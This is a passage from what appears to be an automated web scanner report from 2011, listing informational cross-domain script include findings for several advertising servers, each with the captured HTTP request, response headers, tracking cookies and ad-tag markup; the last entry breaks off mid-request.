<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3ND
...[SNIP]...
NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1654066132?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<script language='JavaScript1.1' SRC="http://fw.adsafeprotected.com/rjss/dc/10625/165712/adj/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1654066132?">
</SCRIPT>
...[SNIP]...
20.28. http://o-va3.wtp101.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va3.wtp101.com
Path:   /imp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /imp?bc=CgVvcGVueBIkOTI0NmQ5NWEtNmQxOS00MDNhLWExZjAtYTM2ZWQ1MWY2ZjFhIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscvhQXm1RSwi_skszjsFtTxBnAoxa_C0A HTTP/1.1
Host: o-va3.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; opvc=!3919,CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M#,1317600740; pvmap=!3919,1317600740,ova!3919,1317600698,ova!3919,1317600201,ova3; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:30:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:30:52 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkOTI0NmQ5NWEtNmQxOS00MDNhLWExZjAtYTM2ZWQ1MWY2ZjFhIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M#,1317601852; path=/; expires=Wed, 02 Oct 2013 00:30:52 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317601852,ova3!3919,1317601775,ova3!3919,1317600740,ova!3919,1317600698,ova!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:30:52 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkOTI0Nm
...[SNIP]...
NmPgBADpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1505999587?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<script language='JavaScript1.1' SRC="http://fw.adsafeprotected.com/rjss/dc/10625/165712/adj/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkOTI0NmQ5NWEtNmQxOS00MDNhLWExZjAtYTM2ZWQ1MWY2ZjFhIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBFbGnwzuWLU.8QSBvbXlc1QAQPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1505999587?">
</SCRIPT>
...[SNIP]...
20.29. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-15.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /a/7845/12566/22557-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk=8154/13209; ses15=13378^2&13209^2; csi15=3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^149&12566^2&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29334; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599465&3223117.js^3^1317599464^1317599464&3226249.js^10^1317599341^1317599463&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:51:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script language="JavaScript" src="http://a.collective-media.net/adj/cm.guardian/;sz=300x250;ord=$random$?" type="text/javascript"></script>
...[SNIP]...
20.30. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /a/7845/12566/22557-2.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13378^2&12566^3; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3188003.js^3^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1971

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script language="JavaScript" src="http://a.collective-media.net/adj/cm.guardian/;sz=728x90;ord=$random$?" type="text/javascript"></script>
...[SNIP]...
20.31. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/26848-15.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /a/7845/12566/26848-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2&12566^3&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599882&2748761.js^1^1317599431^1317599431&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script language="JavaScript" src="http://a.collective-media.net/adj/cm.guardian/;sz=300x250;ord=$random$?" type="text/javascript"></script>
...[SNIP]...
20.32. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1072156.812162.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:16 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 603
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:12:15 GMT
Connection: close
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:12:16 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000812162/mnum=0001072156/cstr=34930016=_4e88fde0,0213706401,812162^1072156^1184^0,1_/xsxdata=$XSXDATA/bnum=34930016/optn=64?trg=;ord=0213706401?">');document.write('<\/SCRIPT>
...[SNIP]...
20.33. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
